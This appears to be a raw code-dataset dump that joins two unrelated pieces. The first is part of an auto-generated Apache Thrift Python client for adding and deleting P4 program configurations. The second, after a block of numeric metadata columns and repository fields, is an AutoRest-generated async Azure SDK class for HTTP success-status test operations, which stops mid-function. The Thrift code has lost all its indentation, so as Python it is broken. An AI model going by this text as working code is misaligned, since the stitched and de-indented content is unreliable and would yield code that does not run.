def recv_p4_program_config_add(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = p4_program_config_add_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "p4_program_config_add failed: unknown result");
def p4_program_config_delete(self, program_name):
"""
Parameters:
- program_name
"""
self.send_p4_program_config_delete(program_name)
return self.recv_p4_program_config_delete()
def send_p4_program_config_delete(self, program_name):
self._oprot.writeMessageBegin('p4_program_config_delete', TMessageType.CALL, self._seqid)
args = p4_program_config_delete_args()
args.program_name = program_name
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_p4_program_config_delete(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = p4_program_config_delete_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "p4_program_config_delete failed: unknown result");
class Processor(Iface, TProcessor):
def __init__(self, handler):
self._handler = handler
self._processMap = {}
self._processMap["p4_program_config_add"] = Processor.process_p4_program_config_add
self._processMap["p4_program_config_delete"] = Processor.process_p4_program_config_delete
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_p4_program_config_add(self, seqid, iprot, oprot):
args = p4_program_config_add_args()
args.read(iprot)
iprot.readMessageEnd()
result = p4_program_config_add_result()
result.success = self._handler.p4_program_config_add(args.program_name, args.config_str)
oprot.writeMessageBegin("p4_program_config_add", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_p4_program_config_delete(self, seqid, iprot, oprot):
args = p4_program_config_delete_args()
args.read(iprot)
iprot.readMessageEnd()
result = p4_program_config_delete_result()
result.success = self._handler.p4_program_config_delete(args.program_name)
oprot.writeMessageBegin("p4_program_config_delete", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class p4_program_config_add_args:
"""
Attributes:
- program_name
- config_str
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'program_name', None, None, ), # 1
(2, TType.STRING, 'config_str', None, None, ), # 2
)
def __init__(self, program_name=None, config_str=None,):
self.program_name = program_name
self.config_str = config_str
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.program_name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.config_str = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_add_args')
if self.program_name is not None:
oprot.writeFieldBegin('program_name', TType.STRING, 1)
oprot.writeString(self.program_name)
oprot.writeFieldEnd()
if self.config_str is not None:
oprot.writeFieldBegin('config_str', TType.STRING, 2)
oprot.writeString(self.config_str)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.program_name)
value = (value * 31) ^ hash(self.config_str)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_add_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_add_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_delete_args:
"""
Attributes:
- program_name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'program_name', None, None, ), # 1
)
def __init__(self, program_name=None,):
self.program_name = program_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.program_name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_delete_args')
if self.program_name is not None:
oprot.writeFieldBegin('program_name', TType.STRING, 1)
oprot.writeString(self.program_name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.program_name)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class p4_program_config_delete_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.I32, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.I32:
self.success = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('p4_program_config_delete_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.I32, 0)
oprot.writeI32(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 30.607981
| 188
| 0.689087
| 1,584
| 13,039
| 5.347854
| 0.09154
| 0.044623
| 0.074371
| 0.044623
| 0.859403
| 0.813599
| 0.786684
| 0.745721
| 0.715736
| 0.710778
| 0
| 0.010201
| 0.203083
| 13,039
| 425
| 189
| 30.68
| 0.805024
| 0.032825
| 0
| 0.774295
| 1
| 0
| 0.040697
| 0.023599
| 0
| 0
| 0
| 0
| 0
| 1
| 0.141066
| false
| 0.00627
| 0.018809
| 0.037618
| 0.30094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e6840d77600abe9dfe913678260e998c4ccbcc23
| 35,401
|
py
|
Python
|
test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
|
Azure/autorest.python
|
c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
|
[
"MIT"
] | 35
|
2018-04-03T12:15:53.000Z
|
2022-03-11T14:03:34.000Z
|
test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
|
Azure/autorest.python
|
c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
|
[
"MIT"
] | 652
|
2017-08-28T22:44:41.000Z
|
2022-03-31T21:20:31.000Z
|
test/vanilla/legacy/Expected/AcceptanceTests/Http/httpinfrastructure/aio/operations/_http_success_operations.py
|
Azure/autorest.python
|
c36f5c1a2d614a1eeba6fec6a2c02517f2d1cce7
|
[
"MIT"
] | 29
|
2017-08-28T20:57:01.000Z
|
2022-03-11T14:03:38.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator_async import distributed_trace_async
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._http_success_operations import (
build_delete200_request,
build_delete202_request,
build_delete204_request,
build_get200_request,
build_head200_request,
build_head204_request,
build_head404_request,
build_options200_request,
build_patch200_request,
build_patch202_request,
build_patch204_request,
build_post200_request,
build_post201_request,
build_post202_request,
build_post204_request,
build_put200_request,
build_put201_request,
build_put202_request,
build_put204_request,
)
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class HttpSuccessOperations:
"""HttpSuccessOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~httpinfrastructure.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def head200(self, **kwargs: Any) -> None:
"""Return 200 status code if successful.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head200_request(
template_url=self.head200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def get200(self, **kwargs: Any) -> bool:
"""Get 200 success.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bool]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_get200_request(
template_url=self.get200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize("bool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def options200(self, **kwargs: Any) -> bool:
"""Options 200 success.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: bool, or the result of cls(response)
:rtype: bool
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[bool]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_options200_request(
template_url=self.options200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize("bool", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
options200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def put200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put boolean value true returning 200 success.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put200_request(
content_type=content_type,
json=json,
template_url=self.put200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def patch200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returning 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch200_request(
content_type=content_type,
json=json,
template_url=self.patch200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def post200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post bollean value true in request that returns a 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post200_request(
content_type=content_type,
json=json,
template_url=self.post200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def delete200(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete simple boolean value true returns 200.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete200_request(
content_type=content_type,
json=json,
template_url=self.delete200.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete200.metadata = {"url": "/http/success/200"} # type: ignore
@distributed_trace_async
async def put201(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 201.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put201_request(
content_type=content_type,
json=json,
template_url=self.put201.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put201.metadata = {"url": "/http/success/201"} # type: ignore
@distributed_trace_async
async def post201(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 201 (Created).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post201_request(
content_type=content_type,
json=json,
template_url=self.post201.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post201.metadata = {"url": "/http/success/201"} # type: ignore
@distributed_trace_async
async def put202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 202 (Accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put202_request(
content_type=content_type,
json=json,
template_url=self.put202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def patch202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returns 202.
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_patch202_request(
content_type=content_type,
json=json,
template_url=self.patch202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
patch202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def post202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Post true Boolean value in request returns 202 (Accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_post202_request(
content_type=content_type,
json=json,
template_url=self.post202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
post202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def delete202(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Delete true Boolean value in request returns 202 (accepted).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_delete202_request(
content_type=content_type,
json=json,
template_url=self.delete202.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete202.metadata = {"url": "/http/success/202"} # type: ignore
@distributed_trace_async
async def head204(self, **kwargs: Any) -> None:
"""Return 204 status code if successful.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
request = build_head204_request(
template_url=self.head204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
head204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def put204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Put true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
error_map = {401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop("error_map", {}))
content_type = kwargs.pop("content_type", "application/json") # type: Optional[str]
if boolean_value is not None:
json = self._serialize.body(boolean_value, "bool")
else:
json = None
request = build_put204_request(
content_type=content_type,
json=json,
template_url=self.put204.metadata["url"],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, pipeline_response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
put204.metadata = {"url": "/http/success/204"} # type: ignore
@distributed_trace_async
async def patch204(self, boolean_value: Optional[bool] = True, **kwargs: Any) -> None:
"""Patch true Boolean value in request returns 204 (no content).
:param boolean_value: Simple boolean value true.
:type boolean_value: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop("cls", None) # type: ClsType[None]
